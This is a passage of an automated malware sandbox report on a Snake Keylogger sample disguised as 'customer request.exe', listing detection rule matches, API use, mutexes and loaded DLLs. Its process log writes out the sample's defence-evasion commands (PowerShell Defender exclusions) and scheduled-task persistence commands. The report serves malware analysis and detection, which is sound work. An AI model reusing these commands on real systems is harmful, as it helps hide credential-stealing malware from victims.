            Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: customer request.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: tjvxuavKFXO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.csBase64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.csBase64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.csBase64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, R.csBase64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
            Source: C:\Users\user\Desktop\customer request.exeFile created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMutant created: \Sessions\1\BaseNamedObjects\jLpANYN
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
            Source: C:\Users\user\Desktop\customer request.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6BAE.tmpJump to behavior
            Source: customer request.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: customer request.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\customer request.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: customer request.exeReversingLabs: Detection: 29%
            Source: customer request.exeVirustotal: Detection: 35%
            Source: C:\Users\user\Desktop\customer request.exeFile read: C:\Users\user\Desktop\customer request.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ntasn1.dllJump to behavior
